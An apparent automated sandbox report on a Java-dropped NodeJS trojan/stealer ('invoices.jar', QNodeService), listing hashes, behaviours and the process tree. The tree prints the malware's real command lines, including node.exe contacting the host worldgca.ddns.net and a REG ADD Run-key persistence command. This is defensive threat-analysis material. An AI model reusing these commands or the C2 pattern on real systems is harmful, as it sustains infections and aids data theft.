Analysis
-
max time kernel
69s -
max time network
135s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
13-10-2020 17:53
Static task
static1
Behavioral task
behavioral1
Sample
invoices.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
invoices.jar
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
invoices.jar
-
Size
328KB
-
MD5
f8831577be00b54d782b5745000c2ba6
-
SHA1
fc2818ce3f3e726453d8be3f84fdfd0ce53c771a
-
SHA256
cb7a320970092e3ab4fef6740f59658fb12353d5526c4ed6bdf9cbd6f3a37e23
-
SHA512
444415613ba9952859e17a119533f5f6a2e3a420caaa350ebb444154ac2d25b64496fc8ee93e6f180708b543c1edae36a1d846bc30f8c1114c0cb167bb83f695
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 3132 node.exe 3372 node.exe 3944 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\a2806640-26ea-402c-be47-cce662c49ab1 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ad46-161.dat js behavioral2/files/0x000100000001ad46-164.dat js behavioral2/files/0x000100000001ad46-168.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 22 wtfismyip.com 23 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3132 node.exe 3132 node.exe 3132 node.exe 3132 node.exe 3372 node.exe 3372 node.exe 3372 node.exe 3372 node.exe 3944 node.exe 3944 node.exe 3944 node.exe 3944 node.exe 3944 node.exe 3944 node.exe 3944 node.exe 3944 node.exe 3944 node.exe 3944 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3488 wrote to memory of 772 3488 java.exe 73 PID 3488 wrote to memory of 772 3488 java.exe 73 PID 772 wrote to memory of 3132 772 javaw.exe 77 PID 772 wrote to memory of 3132 772 javaw.exe 77 PID 3132 wrote to memory of 3372 3132 node.exe 79 PID 3132 wrote to memory of 3372 3132 node.exe 79 PID 3372 wrote to memory of 3944 3372 node.exe 80 PID 3372 wrote to memory of 3944 3372 node.exe 80 PID 3944 wrote to memory of 536 3944 node.exe 82 PID 3944 wrote to memory of 536 3944 node.exe 82 PID 536 wrote to memory of 2200 536 cmd.exe 83 PID 536 wrote to memory of 2200 536 cmd.exe 83
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\invoices.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3488 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\2e8e2780.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain worldgca.ddns.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_QTv87n\boot.js --hub-domain worldgca.ddns.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_QTv87n\boot.js --hub-domain worldgca.ddns.net5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "a2806640-26ea-402c-be47-cce662c49ab1" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "a2806640-26ea-402c-be47-cce662c49ab1" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:2200
-
-
-
-
-
-